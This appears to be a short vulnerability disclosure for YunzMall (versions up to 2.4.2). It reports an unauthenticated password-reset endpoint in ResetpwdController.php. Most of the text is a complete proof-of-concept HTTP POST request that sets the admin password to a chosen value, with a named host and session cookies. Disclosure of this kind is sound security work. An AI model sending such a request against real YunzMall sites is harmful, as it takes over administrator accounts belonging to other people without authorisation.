YunzMall has an Arbitrary User Password Reset Vulnerability

BUG_Author:

glzjin

Affected version:

≤2.4.2

Vendor:

http://yunzmall.com/

Software:

http://yunzmall.com/

Vulnerability File:

• /app/platform/controllers/ResetpwdController.php

Description:

1.In file /app/platform/controllers/ResetpwdController.php there is a pre-auth endpoint to let us to reset any user's password.

2. So we may send this request to this endpoint to reset admin's password.

POST /admin/changePwd HTTP/1.1
Host: hz.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=isfrf9v0tfs5jrjm2lohqk4uuu; laravel_session=P6MP2ICdiNnDzgO2ZtyeQqqzInAhKmyeTzN9HQHK
Content-Length: 54

username=admin&pwd=Hacked123!%40%23&mobile=13800138001

3. Now we may login into admin user with this password.